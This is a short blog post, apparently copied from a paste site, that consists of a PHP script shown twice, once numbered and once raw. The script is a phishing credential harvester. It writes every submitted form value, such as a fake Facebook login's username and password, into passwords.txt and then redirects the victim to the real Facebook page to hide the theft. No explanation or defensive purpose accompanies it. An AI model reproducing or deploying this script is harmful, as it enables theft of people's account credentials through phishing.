whypost: Code

Code





PHP 0.30 KB
  1. header("Location: http://www.facebook.com/home.php? ");
  2. $handle = fopen("passwords.txt", "a");
  3. foreach($_GET as $variable => $value) {
  4. fwrite($handle, $variable);
  5. fwrite($handle, "=");
  6. fwrite($handle, $value);
  7. fwrite($handle, "\r\n");
  8. }
  9. fwrite($handle, "\r\n");
  10. fclose($handle);
  11. exit;
  12. ?>
RAW Paste Data

header("Location: http://www.facebook.com/home.php? ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

Nessun commento:

Posta un commento